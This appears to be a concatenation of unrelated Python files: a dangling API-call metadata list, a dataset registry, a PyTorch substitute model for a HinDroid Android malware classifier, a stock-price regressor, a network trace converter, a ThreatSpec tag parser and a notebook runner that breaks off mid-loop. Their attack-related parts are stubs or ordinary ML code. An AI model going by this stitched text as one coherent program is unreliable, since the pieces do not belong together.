'tests.functional.utils.FlaskTestRig.setup_app', 'FlaskTestRig.setup_app', ([], {'n_users': '(10)'}), '(n_users=10)\n', (4281, 4293), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((4295, 4346), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""user_id"""', '[3, 4, 5, 6, 7]'], {}), "('user_id', [3, 4, 5, 6, 7])\n", (4318, 4346), False, 'import pytest\n'), ((614, 658), 'tests.functional.utils.FlaskTestRig.extract_rig_from_kwargs', 'FlaskTestRig.extract_rig_from_kwargs', (['kwargs'], {}), '(kwargs)\n', (650, 658), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((899, 919), 'json.loads', 'json.loads', (['res.data'], {}), '(res.data)\n', (909, 919), False, 'import json\n'), ((1399, 1443), 'tests.functional.utils.FlaskTestRig.extract_rig_from_kwargs', 'FlaskTestRig.extract_rig_from_kwargs', (['kwargs'], {}), '(kwargs)\n', (1435, 1443), False, 'from tests.functional.utils import FlaskTestRig, login, 
token_auth_header_field\n'), ((1604, 1627), 'tests.functional.utils.login', 'login', (['rig.client', 'user'], {}), '(rig.client, user)\n', (1609, 1627), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((1891, 1932), 'tests.functional.utils.login', 'login', (['rig.client', 'user'], {'should_fail': '(True)'}), '(rig.client, user, should_fail=True)\n', (1896, 1932), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((2298, 2342), 'tests.functional.utils.FlaskTestRig.extract_rig_from_kwargs', 'FlaskTestRig.extract_rig_from_kwargs', (['kwargs'], {}), '(kwargs)\n', (2334, 2342), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((2547, 2570), 'tests.functional.utils.login', 'login', (['rig.client', 'user'], {}), '(rig.client, user)\n', (2552, 2570), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((3202, 3246), 'tests.functional.utils.FlaskTestRig.extract_rig_from_kwargs', 'FlaskTestRig.extract_rig_from_kwargs', (['kwargs'], {}), '(kwargs)\n', (3238, 3246), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((3489, 3507), 'copy.deepcopy', 'deepcopy', (['expected'], {}), '(expected)\n', (3497, 3507), False, 'from copy import deepcopy\n'), ((3785, 3808), 'tests.functional.utils.login', 'login', (['rig.client', 'user'], {}), '(rig.client, user)\n', (3790, 3808), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((4705, 4749), 'tests.functional.utils.FlaskTestRig.extract_rig_from_kwargs', 'FlaskTestRig.extract_rig_from_kwargs', (['kwargs'], {}), '(kwargs)\n', (4741, 4749), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((4854, 4872), 'copy.deepcopy', 'deepcopy', (['expected'], {}), '(expected)\n', (4862, 4872), False, 'from copy import deepcopy\n'), ((5093, 5116), 
'tests.functional.utils.login', 'login', (['rig.client', 'user'], {}), '(rig.client, user)\n', (5098, 5116), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((5428, 5478), 'tests.functional.utils.login', 'login', (['rig.client', 'expected_full'], {'should_fail': '(True)'}), '(rig.client, expected_full, should_fail=True)\n', (5433, 5478), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((1819, 1839), 'json.loads', 'json.loads', (['res.data'], {}), '(res.data)\n', (1829, 1839), False, 'import json\n'), ((2759, 2779), 'json.loads', 'json.loads', (['res.data'], {}), '(res.data)\n', (2769, 2779), False, 'import json\n'), ((4107, 4127), 'json.loads', 'json.loads', (['res.data'], {}), '(res.data)\n', (4117, 4127), False, 'import json\n'), ((4214, 4255), 'tests.functional.utils.login', 'login', (['rig.client', 'user'], {'should_fail': '(True)'}), '(rig.client, user, should_fail=True)\n', (4219, 4255), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((5354, 5374), 'json.loads', 'json.loads', (['res.data'], {}), '(res.data)\n', (5364, 5374), False, 'import json\n'), ((1735, 1765), 'tests.functional.utils.token_auth_header_field', 'token_auth_header_field', (['token'], {}), '(token)\n', (1758, 1765), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((2675, 2705), 'tests.functional.utils.token_auth_header_field', 'token_auth_header_field', (['token'], {}), '(token)\n', (2698, 2705), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((3951, 3981), 'tests.functional.utils.token_auth_header_field', 'token_auth_header_field', (['token'], {}), '(token)\n', (3974, 3981), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((4026, 4053), 'json.dumps', 'json.dumps', (['users_to_delete'], {}), '(users_to_delete)\n', (4036, 
4053), False, 'import json\n'), ((5270, 5300), 'tests.functional.utils.token_auth_header_field', 'token_auth_header_field', (['token'], {}), '(token)\n', (5293, 5300), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n')] |
"""
model construction function
"""
import torch
import torch.nn as nn
from fvcore.common.registry import Registry
DATASET_REGISTRY=Registry("DATASET")
def build_dataset(dataset_name,mode,cfg,):
"""
:param cfg:
:param dataset_name: avenue
:param mode: train /test
:return:
"""
# print("MODEL_REGISTRY", MODEL_REGISTRY.__dict__)
# name=dataset_name.capitalize()
# init model with xavier
return DATASET_REGISTRY.get(dataset_name)(mode,cfg)
if __name__=="__main__":
print("dataset register")
| [
"fvcore.common.registry.Registry"
] | [((135, 154), 'fvcore.common.registry.Registry', 'Registry', (['"""DATASET"""'], {}), "('DATASET')\n", (143, 154), False, 'from fvcore.common.registry import Registry\n')] |
from __future__ import print_function
from scipy import sparse
import pandas as pd
import numpy as np
import argparse, os
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
from torch.optim.lr_scheduler import StepLR
from torch.utils.data import Dataset, DataLoader
from sklearn.metrics import classification_report, confusion_matrix
from src.imbalanced_dataset_sampler.imbalanced import ImbalancedDatasetSampler
def attack():
dataset = HindroidDataset(**dataset_args)
fit_substitute()
pass
def fit_substitute(train_dataset_args, test_dataset_args, no_cuda=False):
pass
# use_cuda = not no_cuda and torch.cuda.is_available()
# torch.manual_seed(args.seed)
# device = torch.device("cuda" if use_cuda else "cpu")
# train_kwargs = {'batch_size': batch_size}
# test_kwargs = {'batch_size': batch_size}
# if use_cuda:
# cuda_kwargs = {'num_workers': 1,
# 'pin_memory': True}
# train_kwargs.update(cuda_kwargs)
# test_kwargs.update(cuda_kwargs)
# train_dataset = HindroidDataset(**train_dataset_args)
# test_dataset = HindroidDataset(**test_dataset_args)
# train_dataset = HindroidDataset(**train_datset_args)
# train_loader = torch.utils.data.DataLoader(
# train_dataset,
# sampler = ImbalancedDatasetSampler(
# train_dataset,
# callback_get_label = hindroid_custom_get_label),
# **train_kwargs)
# test_loader = torch.utils.data.DataLoader(
# test_dataset,
# sampler = ImbalancedDatasetSampler(
# test_dataset,
# callback_get_label = hindroid_custom_get_label),
# **train_kwargs)
# model = HindroidSubstitute().to(device)
# optimizer = optim.Adadelta(model.parameters(), lr=args.lr)
# scheduler = StepLR(optimizer, step_size=1, gamma=args.gamma)
# for epoch in range(1, args.epochs + 1):
# train(args, model, device, train_loader, optimizer, epoch)
# test(model, device, test_loader)
# scheduler.step()
# torch.save(model.state_dict(), "mnist_cnn.pt")
class HindroidDataset(Dataset):
def __init__(self, features_path, labels_path, label_col='m2vDroid', transform=None):
'''
Creates a dataset from the A matrix representation of apps and their associated labels.
Parameters:
-------------------
features_path: Path to A matrix in sparse format.
labels_path: Path to labels in csv format.
label_col: Default 'm2vDroid'. Useful for specifying which kernel to use for HinDroid.
'''
self.features = sparse.load_npz(os.path.join(features_path))
self.feature_width = self.features.shape[1]
features_folder = os.path.split(features_path)[0]
self.features_idx = list(pd.read_csv(
os.path.join(features_folder, 'predictions.csv'),
usecols=['app'],
squeeze=True
))
self.transform = transform
try:
self.labels = pd.read_csv(
labels_path,
usecols=['app', label_col],
index_col = 'app',
squeeze=True
)
self.labels = self.labels[self.features_idx].values # align labels with features index
except (KeyError, ValueError) as e:
print(e)
print('Seems like you may be trying to use a different model. This class is setup for m2vDroid by default.')
print('For HinDroid you must specify `label_col` as either AAT, ABAT, APAT, ABPBTAT, or APBPTAT.')
assert (self.features.shape[0] == self.labels.size), 'Length mismatch between features and labels.'
def __len__(self):
return self.features.shape[0]
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
features = self.features[idx]
features = features.todense().astype('float').A
labels = self.labels[idx]
# if self.transform:
# features = self.transform(features)
# labels = self.transform(labels)
# sample = {'features': features, 'labels': labels}
return features, labels
def get_labels(self, idx):
return self.labels[idx]
def hindroid_custom_get_label(dataset, idx):
return dataset.get_labels(idx)
class HindroidSubstitute(nn.Module):
def __init__(self, n_features):
super(HindroidSubstitute, self).__init__()
self.layer_1 = nn.Linear(n_features, 64, bias=False)
# Linear - how to freeze layer ^
# biases = false
self.layer_2 = nn.Linear(64, 64, bias=False)
self.layer_3 = nn.Linear(64, 64, bias=False)
self.layer_4 = nn.Linear(64, 2, bias=False)
def forward(self, x):
if not torch.is_tensor(x):
x = torch.from_numpy(x)
x = x.view(x.shape[0], -1)
x = F.relu(self.layer_1(x))
x = F.relu(self.layer_2(x))
x = F.relu(self.layer_3(x))
x = self.layer_4(x)
return x # logits
def train(model, device, train_loader, optimizer, epoch, weight=None):
model.train()
for batch_idx, (data, target) in enumerate(train_loader):
data, target = data.to(device), target.to(device)
optimizer.zero_grad()
output = F.log_softmax(model(data), dim=1)
loss = F.nll_loss(output, target, weight=weight) # do we use different loss?
loss.backward()
optimizer.step()
# logging
log_interval = 10
if batch_idx % log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.item()))
# if batch_idx % args.log_interval == 0:
# print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
# epoch, batch_idx * len(data), len(train_loader.dataset),
# 100. * batch_idx / len(train_loader), loss.item()))
# if args.dry_run:
# break
def test(model, device, test_loader, weight=None):
model.eval()
test_loss = 0
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.to(device), target.to(device)
output = model(data)
output = F.log_softmax(output, dim=1)
loss = F.nll_loss(output, target, weight=weight, reduction='sum').item() # sum up batch loss
test_loss += loss
pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
test_loss /= len(test_loader.dataset)
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
test_loss, correct, len(test_loader.dataset),
100. * correct / len(test_loader.dataset))) | [
"pandas.read_csv",
"torch.nn.functional.nll_loss",
"os.path.join",
"torch.from_numpy",
"os.path.split",
"torch.is_tensor",
"torch.nn.Linear",
"torch.nn.functional.log_softmax",
"torch.no_grad"
] | [((3932, 3952), 'torch.is_tensor', 'torch.is_tensor', (['idx'], {}), '(idx)\n', (3947, 3952), False, 'import torch\n'), ((4667, 4704), 'torch.nn.Linear', 'nn.Linear', (['n_features', '(64)'], {'bias': '(False)'}), '(n_features, 64, bias=False)\n', (4676, 4704), True, 'import torch.nn as nn\n'), ((4794, 4823), 'torch.nn.Linear', 'nn.Linear', (['(64)', '(64)'], {'bias': '(False)'}), '(64, 64, bias=False)\n', (4803, 4823), True, 'import torch.nn as nn\n'), ((4847, 4876), 'torch.nn.Linear', 'nn.Linear', (['(64)', '(64)'], {'bias': '(False)'}), '(64, 64, bias=False)\n', (4856, 4876), True, 'import torch.nn as nn\n'), ((4900, 4928), 'torch.nn.Linear', 'nn.Linear', (['(64)', '(2)'], {'bias': '(False)'}), '(64, 2, bias=False)\n', (4909, 4928), True, 'import torch.nn as nn\n'), ((5534, 5575), 'torch.nn.functional.nll_loss', 'F.nll_loss', (['output', 'target'], {'weight': 'weight'}), '(output, target, weight=weight)\n', (5544, 5575), True, 'import torch.nn.functional as F\n'), ((6405, 6420), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (6418, 6420), False, 'import torch\n'), ((2740, 2767), 'os.path.join', 'os.path.join', (['features_path'], {}), '(features_path)\n', (2752, 2767), False, 'import argparse, os\n'), ((2847, 2875), 'os.path.split', 'os.path.split', (['features_path'], {}), '(features_path)\n', (2860, 2875), False, 'import argparse, os\n'), ((3136, 3223), 'pandas.read_csv', 'pd.read_csv', (['labels_path'], {'usecols': "['app', label_col]", 'index_col': '"""app"""', 'squeeze': '(True)'}), "(labels_path, usecols=['app', label_col], index_col='app',\n squeeze=True)\n", (3147, 3223), True, 'import pandas as pd\n'), ((4971, 4989), 'torch.is_tensor', 'torch.is_tensor', (['x'], {}), '(x)\n', (4986, 4989), False, 'import torch\n'), ((5007, 5026), 'torch.from_numpy', 'torch.from_numpy', (['x'], {}), '(x)\n', (5023, 5026), False, 'import torch\n'), ((6579, 6607), 'torch.nn.functional.log_softmax', 'F.log_softmax', (['output'], {'dim': '(1)'}), '(output, 
dim=1)\n', (6592, 6607), True, 'import torch.nn.functional as F\n'), ((2937, 2985), 'os.path.join', 'os.path.join', (['features_folder', '"""predictions.csv"""'], {}), "(features_folder, 'predictions.csv')\n", (2949, 2985), False, 'import argparse, os\n'), ((6627, 6685), 'torch.nn.functional.nll_loss', 'F.nll_loss', (['output', 'target'], {'weight': 'weight', 'reduction': '"""sum"""'}), "(output, target, weight=weight, reduction='sum')\n", (6637, 6685), True, 'import torch.nn.functional as F\n')] |
# importing libraries
import warnings
warnings.filterwarnings("ignore")
import sys
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
import xgboost as xgb
from catboost import CatBoostRegressor
import lightgbm as lgb
from sqlalchemy import create_engine
import pickle
from sklearn.metrics import r2_score,mean_absolute_error
train_period = 7
predict_period = 1
n_day_later_predict= 7
def get_rolling_data(X,y,train_period,predict_period=1,n_day_later_predict=1):
"""
Generating Timeseries Input And Output Data.
Parameters:
X,y (DataFrame): Features,Labels
train_period (int): Timesteps For Model
predict_period (int): Predict On The nth Day Of The End Of The Training Window
Returns:
rolling_X (DataFrame): Features
rolling_y (DataFrame): Labels
"""
assert X.shape[0] == y.shape[0], (
'X.shape: %s y.shape: %s' % (X.shape, y.shape))
rolling_X, rolling_y = [],[]
for i in range(len(X)-train_period-predict_period-(n_day_later_predict)):
curr_X=X.iloc[i:i+train_period,:]
curr_y=y.iloc[i+train_period+n_day_later_predict:i+train_period+predict_period+n_day_later_predict]
rolling_X.append(curr_X.values.tolist())
if predict_period == 1:
rolling_y.append(curr_y.values.tolist()[0])
else:
rolling_y.append(curr_y.values.tolist())
rolling_X = np.array(rolling_X)
rolling_y = np.array(rolling_y)
return rolling_X, rolling_y
def load_data(database_filepath):
"""
Loading Data From Database.
Splitting X And Y Columns As TimeSeries Data By Calling get_rolling_data Method.
Parameters:
database_filepath (str): Filepath Where Database Is Located.
Returns:
X (DataFrame): Features
Y (DataFrame): Labels
"""
# loading data from database
db_name = 'sqlite:///{}'.format(database_filepath)
engine = create_engine(db_name)
# using pandas to read table from database
df = pd.read_sql_table('Stock',engine)
rolling_X, rolling_y = get_rolling_data(df, df.loc[:,'Stock_Adj Close'], train_period=train_period,
predict_period=predict_period,
n_day_later_predict=n_day_later_predict)
return rolling_X , rolling_y
class ModelData():
'''Data Class For Model Train, Predict And Validate.'''
def __init__(self,X,y,seed=None,shuffle=True):
self._seed = seed
np.random.seed(self._seed)
assert X.shape[0] == y.shape[0], (
'X.shape: %s y.shape: %s' % (X.shape, y.shape))
self._num_examples = X.shape[0]
# If shuffle
if shuffle:
np.random.seed(self._seed)
randomList = np.arange(X.shape[0])
np.random.shuffle(randomList)
self._X, self._y = X[randomList], y[randomList]
self._X = X
self._y = y
self._epochs_completed = 0
self._index_in_epoch = 0
def train_validate_test_split(self,validate_size=0.10,test_size=0.10):
'''Train, Predict And Validate Splitting Function'''
validate_start = int(self._num_examples*(1-validate_size-test_size)) + 1
test_start = int(self._num_examples*(1-test_size)) + 1
if validate_start > len(self._X) or test_start > len(self._X):
pass
train_X,train_y = self._X[:validate_start],self._y[:validate_start]
validate_X, validate_y = self._X[validate_start:test_start],self._y[validate_start:test_start]
test_X,test_y = self._X[test_start:],self._y[test_start:]
if test_size == 0:
return ModelData(train_X,train_y,self._seed), ModelData(validate_X,validate_y,self._seed)
else:
return ModelData(train_X,train_y,self._seed), ModelData(validate_X,validate_y,self._seed), ModelData(test_X,test_y,self._seed)
@property
def X(self):
return self._X
@property
def y(self):
return self._y
def build_model():
"""
Build Model Function.
This Function's Output Is A Dictionary Of 3 Best Regressor Models i.e. XGB Regressor,
Catboost Regressor And LGBM Regressor.
Returns:
model (Dict) : A Dictionary Of Regressor Models
"""
# xgb regressor
xgb_reg = xgb.XGBRegressor(n_estimators=10000,min_child_weight= 40,learning_rate=0.01,colsample_bytree = 1,subsample = 0.9)
# catboost regressor
cat_reg = CatBoostRegressor(iterations=10000,learning_rate=0.005,loss_function = 'RMSE')
# lgbm regressor
lgbm_reg = lgb.LGBMRegressor(num_leaves=31,learning_rate=0.001, max_bin = 30,n_estimators=10000)
model = {'xgb':xgb_reg,'cat':cat_reg,'lgbm':lgbm_reg}
return model
def evaluate_model(model, X_test, Y_test):
"""
Model Evaluation Function.
Evaluating The Models On Test Set And Computing R2 Score And Mean Absolute Error.
Parameters:
model (Dict) : A Dictionary Of Trained Regressor Models
X_test (DataFrame) : Test Features
Y_test (DataFrame) : Test Labels
"""
# predict on test data
pred = (model['xgb'].predict(X_test) + model['cat'].predict(X_test) + model['lgbm'].predict(X_test)) / 3
# rescaling the predictions
real = np.exp(Y_test)
pred = np.exp(pred)
# computing the r2 score
print('R2 Score :')
print(r2_score(real,pred))
# computing the mean absolute error
print('Mean Absolute Error :')
print(mean_absolute_error(real,pred))
def save_model(model, model_filepath):
"""
Save Model function
This Function Saves Trained Models As Pickle File, To Be Loaded Later.
Parameters:
model (Dict) : A Dictionary Of Trained Regressor Models
model_filepath (str) : Destination Path To Save .pkl File
"""
filename = model_filepath
pickle.dump(model, open(filename, 'wb'))
def main():
if len(sys.argv) == 3:
database_filepath, model_filepath = sys.argv[1:]
print('Loading data...\n DATABASE: {}'.format(database_filepath))
X, Y = load_data(database_filepath)
model_data = ModelData(X, Y,seed=666,shuffle=False)
model_train_data, model_validate_data = model_data.train_validate_test_split(validate_size=0.10,test_size=0)
y_train = model_train_data.y[:,np.newaxis]
y_validate = model_validate_data.y[:,np.newaxis]
X_train = model_train_data.X
X_validate = model_validate_data.X
X_train = X_train.reshape((X_train.shape[0],X_train.shape[1]*X_train.shape[2]))
X_validate = X_validate.reshape((X_validate.shape[0],X_validate.shape[1]*X_validate.shape[2]))
print('Building model...')
model = build_model()
print('Training XGB model...')
model['xgb'].fit(X_train, y_train,eval_set = [(X_validate[:300],y_validate[:300])],early_stopping_rounds = 50,verbose = False)
print('Training Catboost model...')
model['cat'].fit(X_train, y_train,eval_set = [(X_validate[:300],y_validate[:300])],early_stopping_rounds = 50,verbose = False)
print('Training Lgbm model...')
model['lgbm'].fit(X_train, y_train,eval_set = [(X_validate[:300],y_validate[:300].ravel())],early_stopping_rounds = 50,verbose = False)
print('Evaluating Combined model...')
evaluate_model(model, X_validate, y_validate)
print('Saving model...\n MODEL: {}'.format(model_filepath))
save_model(model, model_filepath)
print('Trained model saved!')
else:
print('Please provide the filepath of the Stock database '\
'as the first argument and the filepath of the pickle file to '\
'save the model to as the second argument. \n\nExample: python '\
'train_regressor.py ../data/Stock.db regressor.pkl')
if __name__ == '__main__':
main()
| [
"sqlalchemy.create_engine",
"lightgbm.LGBMRegressor",
"catboost.CatBoostRegressor",
"numpy.array",
"xgboost.XGBRegressor",
"numpy.exp",
"numpy.random.seed",
"pandas.read_sql_table",
"sklearn.metrics.mean_absolute_error",
"sklearn.metrics.r2_score",
"warnings.filterwarnings",
"numpy.arange",
... | [((38, 71), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (61, 71), False, 'import warnings\n'), ((1432, 1451), 'numpy.array', 'np.array', (['rolling_X'], {}), '(rolling_X)\n', (1440, 1451), True, 'import numpy as np\n'), ((1468, 1487), 'numpy.array', 'np.array', (['rolling_y'], {}), '(rolling_y)\n', (1476, 1487), True, 'import numpy as np\n'), ((1959, 1981), 'sqlalchemy.create_engine', 'create_engine', (['db_name'], {}), '(db_name)\n', (1972, 1981), False, 'from sqlalchemy import create_engine\n'), ((2039, 2073), 'pandas.read_sql_table', 'pd.read_sql_table', (['"""Stock"""', 'engine'], {}), "('Stock', engine)\n", (2056, 2073), True, 'import pandas as pd\n'), ((4411, 4528), 'xgboost.XGBRegressor', 'xgb.XGBRegressor', ([], {'n_estimators': '(10000)', 'min_child_weight': '(40)', 'learning_rate': '(0.01)', 'colsample_bytree': '(1)', 'subsample': '(0.9)'}), '(n_estimators=10000, min_child_weight=40, learning_rate=\n 0.01, colsample_bytree=1, subsample=0.9)\n', (4427, 4528), True, 'import xgboost as xgb\n'), ((4564, 4642), 'catboost.CatBoostRegressor', 'CatBoostRegressor', ([], {'iterations': '(10000)', 'learning_rate': '(0.005)', 'loss_function': '"""RMSE"""'}), "(iterations=10000, learning_rate=0.005, loss_function='RMSE')\n", (4581, 4642), False, 'from catboost import CatBoostRegressor\n'), ((4679, 4768), 'lightgbm.LGBMRegressor', 'lgb.LGBMRegressor', ([], {'num_leaves': '(31)', 'learning_rate': '(0.001)', 'max_bin': '(30)', 'n_estimators': '(10000)'}), '(num_leaves=31, learning_rate=0.001, max_bin=30,\n n_estimators=10000)\n', (4696, 4768), True, 'import lightgbm as lgb\n'), ((5439, 5453), 'numpy.exp', 'np.exp', (['Y_test'], {}), '(Y_test)\n', (5445, 5453), True, 'import numpy as np\n'), ((5465, 5477), 'numpy.exp', 'np.exp', (['pred'], {}), '(pred)\n', (5471, 5477), True, 'import numpy as np\n'), ((2543, 2569), 'numpy.random.seed', 'np.random.seed', (['self._seed'], {}), '(self._seed)\n', (2557, 2569), True, 
'import numpy as np\n'), ((5541, 5561), 'sklearn.metrics.r2_score', 'r2_score', (['real', 'pred'], {}), '(real, pred)\n', (5549, 5561), False, 'from sklearn.metrics import r2_score, mean_absolute_error\n'), ((5647, 5678), 'sklearn.metrics.mean_absolute_error', 'mean_absolute_error', (['real', 'pred'], {}), '(real, pred)\n', (5666, 5678), False, 'from sklearn.metrics import r2_score, mean_absolute_error\n'), ((2784, 2810), 'numpy.random.seed', 'np.random.seed', (['self._seed'], {}), '(self._seed)\n', (2798, 2810), True, 'import numpy as np\n'), ((2836, 2857), 'numpy.arange', 'np.arange', (['X.shape[0]'], {}), '(X.shape[0])\n', (2845, 2857), True, 'import numpy as np\n'), ((2870, 2899), 'numpy.random.shuffle', 'np.random.shuffle', (['randomList'], {}), '(randomList)\n', (2887, 2899), True, 'import numpy as np\n')] |
from geosolver.utils.prep import sentence_to_words_statements_values
__author__ = 'minjoon'
def test_prep():
paragraph = r"If \sqrt{x+5}=40.5, what is x+5?"
print(sentence_to_words_statements_values(paragraph))
if __name__ == "__main__":
test_prep()
| [
"geosolver.utils.prep.sentence_to_words_statements_values"
] | [((173, 219), 'geosolver.utils.prep.sentence_to_words_statements_values', 'sentence_to_words_statements_values', (['paragraph'], {}), '(paragraph)\n', (208, 219), False, 'from geosolver.utils.prep import sentence_to_words_statements_values\n')] |
## Creates oracular traces from network traces, used for calculating self-inflicted delay
import glob
import os
import re
import sys
INPUT_PATH = 'cleaned_traces'
OUTPUT_PATH = 'oracular_traces'
def create_oracular_trace(filePath, targetFilePath, mode):
with open(filePath) as f:
with open(targetFilePath, 'w+') as wf:
firstLine = True
for line in f:
value = long(line)
if firstLine:
base = value
firstLine = False
value = (value - base) / 1000.
wf.write('%s %s delivery 20\n' % (mode, value))
if __name__ == '__main__':
if len(sys.argv) >= 2:
source = sys.argv[1]
else:
source = INPUT_PATH
if len(sys.argv) >= 3:
destination = sys.argv[2]
else:
destination = OUTPUT_PATH
if not os.path.exists(destination):
os.makedirs(destination)
networks = glob.glob('%s/*' % source)
for network in networks:
if not os.path.exists(network.replace(source, destination)):
os.makedirs(network.replace(source, destination))
files = glob.glob('%s/*.pps' % network)
for file in files:
mode = re.findall('(uplink|downlink)', file)[0]
create_oracular_trace(file, file.replace(source, destination).replace('.pps', '.out'), mode)
| [
"os.makedirs",
"os.path.exists",
"re.findall",
"glob.glob"
] | [((991, 1017), 'glob.glob', 'glob.glob', (["('%s/*' % source)"], {}), "('%s/*' % source)\n", (1000, 1017), False, 'import glob\n'), ((909, 936), 'os.path.exists', 'os.path.exists', (['destination'], {}), '(destination)\n', (923, 936), False, 'import os\n'), ((946, 970), 'os.makedirs', 'os.makedirs', (['destination'], {}), '(destination)\n', (957, 970), False, 'import os\n'), ((1217, 1248), 'glob.glob', 'glob.glob', (["('%s/*.pps' % network)"], {}), "('%s/*.pps' % network)\n", (1226, 1248), False, 'import glob\n'), ((1300, 1337), 're.findall', 're.findall', (['"""(uplink|downlink)"""', 'file'], {}), "('(uplink|downlink)', file)\n", (1310, 1337), False, 'import re\n')] |
#!/usr/bin/env python
import sys
import json
import re
import logging
from cli.log import LoggingApp
from pythreatspec import pythreatspec as ts
class UniversalParserApp(LoggingApp):
    """Language-agnostic ThreatSpec parser.

    Scans arbitrary text files line by line for ThreatSpec tags hidden behind
    common comment markers and writes the collected report as JSON.
    """

    def parse_file(self, filename):
        """Feed every line of *filename* through the ThreatSpec comment parser."""
        with open(filename) as fh:
            line_no = 1
            for line in fh.readlines():
                line = line.strip()
                self.parser._parse_comment(line, ts.PTSSource(filename, line_no, "universal_parser"))
                line_no += 1

    def main(self):
        # Entry point invoked by cli.LoggingApp after argument parsing.
        self.log.level = logging.INFO
        if self.params.out:
            outfile = self.params.out
        else:
            outfile = "{}.threatspec.json".format(self.params.project)
        self.parser = ts.PyThreatspecParser()
        # Accept tags behind any of these comment markers, in any language.
        comments = ['//', '/*', '#', '"""', '\'\'\'']
        tags = ['alias','describe','connects','review','mitigates','exposes','transfers','accepts']
        self.parser.tag_regex = "^\s*(?:{})*\s*(@(?:{})).*$".format('|'.join([re.escape(c) for c in comments]), '|'.join([re.escape(t) for t in tags]))
        for f in self.params.files:
            self.log.info("Parsing file {}".format(f))
            self.parse_file(f)
        reporter = ts.PyThreatspecReporter(self.parser, self.params.project)
        # NOTE(review): pprint appears unused here.
        from pprint import pprint
        self.log.info("Writing output to {}".format(outfile))
        with open(outfile, "w") as fh:
            json.dump(reporter.export_to_json(), fh, indent=2, separators=(',', ': '))
if __name__ == "__main__":
    # cli.log.LoggingApp wires up argparse and logging from these kwargs.
    app = UniversalParserApp(
        name="universal.py",
        description="ThreatSpec Universal Parser. Parse TreatSpec tags for any language.",
        message_format = '%(asctime)s %(levelname)s: %(message)s'
    )
    app.add_param("-p", "--project", default="default", help="project name (default: default)")
    app.add_param("-o", "--out", default=None, help="output file (default: PROJECT.threatspec.json)")
    app.add_param("files", action="append", help="source files to parse")
    app.run()
| [
"pythreatspec.pythreatspec.PTSSource",
"pythreatspec.pythreatspec.PyThreatspecReporter",
"pythreatspec.pythreatspec.PyThreatspecParser",
"re.escape"
] | [((720, 743), 'pythreatspec.pythreatspec.PyThreatspecParser', 'ts.PyThreatspecParser', ([], {}), '()\n', (741, 743), True, 'from pythreatspec import pythreatspec as ts\n'), ((1193, 1250), 'pythreatspec.pythreatspec.PyThreatspecReporter', 'ts.PyThreatspecReporter', (['self.parser', 'self.params.project'], {}), '(self.parser, self.params.project)\n', (1216, 1250), True, 'from pythreatspec import pythreatspec as ts\n'), ((405, 456), 'pythreatspec.pythreatspec.PTSSource', 'ts.PTSSource', (['filename', 'line_no', '"""universal_parser"""'], {}), "(filename, line_no, 'universal_parser')\n", (417, 456), True, 'from pythreatspec import pythreatspec as ts\n'), ((976, 988), 're.escape', 're.escape', (['c'], {}), '(c)\n', (985, 988), False, 'import re\n'), ((1020, 1032), 're.escape', 're.escape', (['t'], {}), '(t)\n', (1029, 1032), False, 'import re\n')] |
"""
execute a notebook file hierarchy
run_notebooks orig_notebook_dir file_re
run_notebooks autograded "lab_wk9*ipynb"
"""
from pathlib import Path
import click
from .utils import working_directory
import shutil
import nbformat
from nbconvert.preprocessors import ExecutePreprocessor
def run_file(notebook_file, result_file):
    """Execute *notebook_file* in its own directory and write the executed
    notebook to *result_file*."""
    print(f"running {notebook_file}")
    exec_dir = str(notebook_file.parent)
    with open(notebook_file) as f:
        nb = nbformat.read(f, as_version=4)
    # allow_errors=True keeps executing past failing cells, so the output
    # notebook is always produced.
    ep = ExecutePreprocessor(timeout=600,allow_errors=True, kernel_name='python3')
    ep.preprocess(nb, {'metadata': {'path': exec_dir}})
    with open(result_file, 'wt') as f:
        nbformat.write(nb, f)
@click.command()
@click.argument('notebook_folder',type=str)
@click.argument('file_re',type=str)
def main(notebook_folder, file_re):
    """Execute every notebook matching FILE_RE under NOTEBOOK_FOLDER.

    Stale executed copies (files whose name contains 'exec') are deleted;
    every remaining notebook NAME.ipynb is run and saved as NAME_exec.ipynb
    next to the original.
    """
    notebook_folder=Path(notebook_folder).resolve()
    file_re = f"**/{file_re}"  # search recursively
    print(f"starting conversion in {notebook_folder} with {file_re=}")
    # (removed unused local `file_dict`)
    notebook_files = list(notebook_folder.glob(file_re))
    print(f"found {len(notebook_files)} files")
    for the_notebook in notebook_files:
        # Output of a previous run: remove it and skip.
        if str(the_notebook).find("exec") > -1:
            print(f"deleting {the_notebook}")
            the_notebook.unlink()
            continue
        print(f"attempting {the_notebook}")
